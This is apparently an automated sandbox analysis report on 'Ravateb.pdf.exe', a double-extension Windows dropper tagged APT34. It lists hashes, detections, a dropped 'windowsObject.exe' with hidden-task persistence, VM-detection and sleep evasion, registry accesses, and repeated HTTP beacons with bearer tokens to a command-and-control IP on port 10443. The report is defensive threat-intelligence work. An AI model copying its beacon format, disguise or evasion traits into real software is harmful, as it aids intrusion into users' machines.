Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
Ravateb.pdf.exe

Overview

General Information

Sample name:Ravateb.pdf.exe
Analysis ID:1636359
MD5:e7d52ef521b8cd0b405575c185d64033
SHA1:6bb4414d717a290b80cca32655b7198f0c832add
SHA256:b607d60d680f1f1335902a666df843ac9cc58299af6731d2ad1a5ea617cf4a99
Tags:APT34exeuser-smica83
Infos:

Detection

Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
.NET source code contains suspicious base64 encoded strings
.NET source code contains very large strings
Initial sample is a PE file and has a suspicious name
Joe Sandbox ML detected suspicious sample
Uses an obfuscated file name to hide its real file extension (double extension)
Uses known network protocols on non-standard ports
Yara detected PersistenceViaHiddenTask
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • Ravateb.pdf.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\Ravateb.pdf.exe" MD5: E7D52EF521B8CD0B405575C185D64033)
  • windowsObject.exe (PID: 7368 cmdline: C:\users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -time 6.9.2018 MD5: 2BC1C670A5C179E58F6C33C7469B9D98)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1371627977.0000000000ED6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PersistenceViaHiddenTaskYara detected PersistenceViaHiddenTaskJoe Security
    00000000.00000002.1374305706.000000001BE34000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PersistenceViaHiddenTaskYara detected PersistenceViaHiddenTaskJoe Security
      00000000.00000002.1374192389.000000001BDEE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PersistenceViaHiddenTaskYara detected PersistenceViaHiddenTaskJoe Security
        Process Memory Space: Ravateb.pdf.exe PID: 7532JoeSecurity_PersistenceViaHiddenTaskYara detected PersistenceViaHiddenTaskJoe Security

          Sigma Signatures

          System Summary

          barindex
          Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Ravateb.pdf.exe", CommandLine: "C:\Users\user\Desktop\Ravateb.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\Ravateb.pdf.exe, NewProcessName: C:\Users\user\Desktop\Ravateb.pdf.exe, OriginalFileName: C:\Users\user\Desktop\Ravateb.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: "C:\Users\user\Desktop\Ravateb.pdf.exe", ProcessId: 7532, ProcessName: Ravateb.pdf.exe

          Suricata Signatures

          No Suricata rule has matched

          Joe Sandbox Signatures

          • AV Detection
          • Compliance
          • Spreading
          • Networking
          • System Summary
          • Data Obfuscation
          • Persistence and Installation Behavior
          • Boot Survival
          • Hooking and other Techniques for Hiding and Protection
          • Malware Analysis System Evasion
          • Anti Debugging
          • Language, Device and Operating System Detection

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: Ravateb.pdf.exeAvira: detected
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeAvira: detection malicious, Label: TR/Drop.Agent.uvdrx
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeReversingLabs: Detection: 45%
          Source: Ravateb.pdf.exeReversingLabs: Detection: 52%
          Source: Ravateb.pdf.exeVirustotal: Detection: 56%Perma Link
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: Ravateb.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\LocalServer32Jump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\LocalServer32Jump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\LocalServer32Jump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\LocalServer32Jump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\LocalServer32Jump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\LocalServer32Jump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior

          Networking

          barindex
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 10443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 10443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 10443 -> 49723
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 10443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 10443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 10443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 10443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 10443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 10443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 10443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 10443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 10443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 10443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 10443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 10443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 10443 -> 49737
          Source: global trafficTCP traffic: 192.168.2.4:49721 -> 89.46.233.239:10443
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer SLFDCoiLjGhLcClIKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer XLJFCoiLjWhLcClHKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer SLTGCoiLjGhLcClIKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer OLSPCoiLjThLcClBKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer RLNCCoiLjLhLcClGKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer MLCNCoiLjJhLcClVKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer MLLQCoiLjChLcClBKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer FLCLCoiLjThLcClYKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer MLHZCoiLjGhLcClIKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer ILKGCoiLjVhLcClFKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer ELVHCoiLjVhLcClSKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer ULGLCoiLjEhLcClOKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer ULGLCoiLjEhLcClOKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer ULGLCoiLjEhLcClOKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer ZLYPCoiLjZhLcClVKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer QLJXCoiLjMhLcClEKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer ELJNCoiLjYhLcClXKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer RLHGCoiLjZhLcClOKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: unknownTCP traffic detected without corresponding DNS query: 89.46.233.239
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer SLFDCoiLjGhLcClIKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer XLJFCoiLjWhLcClHKQVYFAFNVW0oDBQJTSkJEExQQ
